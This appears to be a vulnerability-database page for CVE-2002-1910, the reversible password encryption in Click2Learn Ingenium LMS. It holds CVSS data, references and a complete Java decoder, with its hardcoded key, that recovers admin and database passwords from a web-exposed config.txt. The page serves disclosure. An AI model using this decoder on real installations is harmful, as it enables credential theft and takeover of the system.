CVE-2002-1910
CVSS 5.0
Published: 2002-12-31 00:00:00
Revised: 2008-09-05 16:31:49

[Original] Click2Learn Ingenium Learning Management System 5.1 and 6.1 uses weak encryption for passwords (reversible algorithm), which allows attackers to obtain passwords.


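[CNNVD] Ingenium Learning Management System Reversible Password Hash Vulnerability (CNNVD-200212-499)

Ingenium Learning Management System is a scalable, 100% web-based application for organizing and managing all aspects of learning.
Ingenium Learning Management System uses a weak algorithm to encrypt user and administrative passwords; a local attacker can exploit this vulnerability to recover administrative and user passwords.
The Ingenium LMS uses a weak, reversible encryption algorithm, so hashed passwords can easily be cracked by an attacker. Combined with the separate issue that the Ingenium LMS administrator password can be retrieved directly over the web, an attacker can use the two vulnerabilities together to obtain the administrator password and thereby control the entire LMS application.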

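- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]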

- CPE (affected platforms and products)

cpe:/a:click2learn:ingenium_learning_management_system:5.1
cpe:/a:click2learn:ingenium_learning_management_system:6.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1910
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1910
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-499
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5970
(UNKNOWN)  BID  5970
http://www.iss.net/security_center/static/10389.php
(UNKNOWN)  XF  ingenium-weak-encryption(10389)

- Vulnerability information

Ingenium Learning Management System Reversible Password Hash Vulnerability
Medium  Design error
2002-12-31 00:00:00 2005-10-20 00:00:00
Remote
        
        

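- Advisories and patches

Vendor patch:
Click2Learn
-----------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://home.click2learn.com/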

- Vulnerability information (21942)

Ingenium Learning Management System 5.1/6.1 Reversible Password Hash Weakness (EDBID:21942)
multiple remote
2002-10-15 Verified
0 Brian Enigma
N/A
source: http://www.securityfocus.com/bid/5970/info

Ingenium Learning Management System uses a weak algorithm to hash user and administrative credentials. Passwords may be trivially obtained by reversing the password hash.

An attacker must be able to gain unauthorized access to the password hashes for this issue to be exploited. This may be achieved by taking advantage of the issue described in Bugtraq ID 5969. Hashed user credentials will also be stored in the database, and may potentially be retrieved by an attacker with the ability to construct or influence SQL queries.

import javax.swing.JOptionPane;

/**
 * IngeniumDecoder
 * Simple program to decode the admin password hash present in the Ingenium
 * LMS config.txt file.  This file is stored within the htdocs directory
 * tree, so is available through a simple URL.  For instance, if your
 * Ingenium install is in http://suffolk.click2learn.com/suffolk_test/, then
 * the config file is located at 
 * http://suffolk.click2learn.com/suffolk_test/config/config.txt.  The same
 * password hashing scheme is used both for the "administrator" login account
 * and the SQL database DSN password.
 *
 * @author  Brian Enigma <enigma@netninja.com>
 */
public class IngeniumDecoder {
    /** The low end of the keyspace */
    public static int WRAP_BOTTOM = 0x20; // space
    /** The high end of the keyspace */
    public static int WRAP_TOP    = 0x7E; // tilde (~)
    public static int CHAR_ZERO   = 0x6E;
    /** The symmetric key */
    public static String KEY      = "9'$%100'%6";
    
    /** 
     * Given some cyphertext, produce the plaintext.  The encryption method
     * employed is a simple Caesar cypher with a key that rotates depending
     * on the position of the character in the plaintext/cyphertext.  The
     * offset is determined by the KEY string above.  (This is similar to
     * obfuscation using ROT-13 coding, only the "13" changes by position.)
     *
     *@param s the cyphertext
     *@return the plaintext
     */
    public static String decode(String s) {
        StringBuffer result = new StringBuffer();
        int max = s.length();
        for (int i=0; i<max; i++) {
            int cypherLetter = (int) s.charAt(i);
            int keyLetter = (int) KEY.charAt(i % KEY.length());
            if (cypherLetter == keyLetter)
                continue;
            int decodeLetter = cypherLetter - keyLetter;
            if (decodeLetter < WRAP_BOTTOM)
                decodeLetter = WRAP_TOP - (WRAP_BOTTOM - decodeLetter);
            if ((decodeLetter >= CHAR_ZERO) && (decodeLetter <= CHAR_ZERO+10))
                result.append(decodeLetter - CHAR_ZERO + Character.getNumericValue('0'));
            else if ((decodeLetter >= WRAP_BOTTOM) && (decodeLetter <= WRAP_TOP))
                result.append(Character.toString((char) decodeLetter));
            else
                result.append("[unknown letter]");
        }
        return result.toString();
    }
    
    /** Creates a new instance of IngeniumDecoder */
    private IngeniumDecoder() {
    }
    
    public static void main(String[] argv) {
        //System.out.println(decode("|smh|#'hp{9'$%10"));
        String hashedPass = JOptionPane.showInputDialog(
            null,
            "Please enter the \"hashed\" admin password from config.txt",
            "Enter hash",
            JOptionPane.QUESTION_MESSAGE);
        if ((hashedPass != null) && (hashedPass.length() > 0))
            JOptionPane.showMessageDialog(
                null, 
                "The decoded password is " + decode(hashedPass),
                "Plaintext",
                JOptionPane.INFORMATION_MESSAGE);
        System.exit(0);
    }
    
}
		

- Vulnerability information

59780
Click2Learn Ingenium Learning Management System Password Encryption Weakness
Local / Remote, Context Dependent Cryptographic
Loss of Confidentiality
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-10-15 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
